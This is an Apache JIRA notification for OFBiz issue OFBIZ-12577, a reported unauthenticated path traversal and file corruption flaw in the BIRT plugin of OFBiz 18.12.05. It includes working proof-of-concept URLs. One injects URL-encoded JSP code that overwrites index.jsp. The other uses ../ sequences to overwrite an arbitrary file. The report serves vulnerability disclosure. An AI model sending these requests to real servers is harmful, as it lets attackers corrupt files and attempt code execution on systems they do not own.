[
https://issues.apache.org/jira/browse/OFBIZ-12577?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacques Le Roux updated OFBIZ-12577:
------------------------------------
Summary: Pending issue (was: Unauth Path Traversal with file corruption)
> Pending issue
> -------------
>
> Key: OFBIZ-12577
> URL: https://issues.apache.org/jira/browse/OFBIZ-12577
> Project: OFBiz
> Issue Type: Bug
> Affects Versions: 18.12.05
> Reporter: Nikita Podotykin
> Priority: Major
> Fix For: 18.12.05
>
> Original Estimate: 72h
> Remaining Estimate: 72h
>
> *Description of the vulnerability*
> *Unauth Path Traversal with file corruption*
> After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142)
> about a remote code execution (RCE) vulnerability in Birt, there was an
> attempt to reproduce it.
> https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
> SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name
> %22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A
> I rewrite the system index.jsp file
> (~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp),
> corrupting it, but the payload didn't work. Before and after making a request
> from an unauthorized user.
> !image-2022-02-21-15-54-00-257.png!
> When accessing the script, the index server returns a 500 error.
> !image-2022-02-21-15-54-51-612.png!
> An unauthorized user can overwrite and corrupt files in the current folder.
> Can it go beyond
> the current folder and overwrite, for example, file /var/tmp/s3cReTfIle? -
> yes!
> https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
> SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test
> !image-2022-02-21-16-00-25-840.png!
--
This message was sent by Atlassian Jira
(v8.20.1#820001)
